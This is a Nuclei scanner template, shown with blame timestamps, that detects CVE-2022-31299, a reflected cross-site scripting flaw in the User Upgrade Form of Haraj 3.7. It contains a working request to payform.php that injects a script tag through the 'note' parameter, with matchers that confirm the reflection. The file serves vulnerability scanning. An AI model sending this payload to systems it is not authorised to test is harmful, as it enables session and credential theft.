2022-09-15 11:58:57 +00:00
id : CVE-2022-31299
info :
2022-09-23 17:53:08 +00:00
name : Haraj 3.7 - Cross-Site Scripting
2022-09-15 11:58:57 +00:00
author : edoardottt
2022-09-23 18:06:19 +00:00
severity : medium
2022-09-16 10:58:33 +00:00
description : |
2022-09-23 17:53:08 +00:00
Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.
2022-09-15 11:58:57 +00:00
reference :
- https://github.com/bigzooooz/CVE-2022-31299
2022-09-18 05:06:01 +00:00
- https://angtech.org
2022-09-23 17:53:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31299
2022-09-15 11:58:57 +00:00
classification :
2022-09-18 05:06:01 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-15 11:58:57 +00:00
cve-id : CVE-2022-31299
2022-09-18 05:06:01 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:angtech:haraj:*:*:*:*:*:*:*:*
epss-score : 0.00103
2022-09-16 10:58:33 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-09-15 11:58:57 +00:00
tags : cve,cve2022,haraj,xss
2023-04-27 04:28:59 +00:00
http :
2022-09-15 11:58:57 +00:00
- method : GET
path :
2022-09-16 10:58:33 +00:00
- "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
2022-09-15 11:58:57 +00:00
matchers-condition : and
matchers :
2022-09-16 10:58:33 +00:00
- type : word
part : body
words :
- '><script>alert(document.domain)</script></textarea>'
- 'content="nextHaraj'
2022-09-16 17:46:43 +00:00
condition : and
2022-09-15 11:58:57 +00:00
- type : word
part : header
words :
- "text/html"
2022-09-16 10:58:33 +00:00
- type : status
status :
- 200
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/22